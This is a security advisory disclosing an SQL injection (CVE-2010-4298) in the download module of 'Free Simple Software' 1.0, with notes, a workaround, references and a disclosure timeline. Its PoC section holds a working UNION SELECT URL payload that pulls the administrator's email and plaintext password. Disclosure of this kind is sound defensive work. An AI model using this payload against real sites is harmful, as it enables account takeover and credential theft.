'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298) Mark Stanislav - mark.stanislav (at) gmail (dot) com [email concealed] I. DESCRIPTION --------------------------------------- A vulnerability exists in the 'Free Simple Software' download module which allows for a 'UNION SELECT' to easily expose the application administrator's plaintext password. II. TESTED VERSION --------------------------------------- 1.0 [Manual Install Version] III. PoC EXPLOIT --------------------------------------- http://site.com/index.php?page=downloads&request=download_now&downloads_ id=' UNION SELECT email_address as name, NULL, NULL, password as file_name, last_name as file_url from admin_users where id!='NULL IV. NOTES --------------------------------------- * User passwords for this web application are not encrypted or hashed which makes this exploit even more concerning. * The PoC assumes that the first user is the administrative user which is the default behavior for the application. * At least 1 download must already exist to enable this exploit. * Due to a previous vulnerability not being fixed 3-months after disclosure (CVE-2010-3307), it's assumable that this application is not being actively developed. V. SOLUTION --------------------------------------- Do not utilize the download module. No patch/upgrade is available at this time. VI. REFERENCES --------------------------------------- http://www.freesimplesoft.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4298 https://www.uncompiled.com/2010/11/free-simple-software-sql-injection-vu lnerability-cve-2010-4298/ VII. TIMELINE --------------------------------------- 11/12/2010: Initial disclosure e-mail to the vendor 11/21/2010: Public disclosure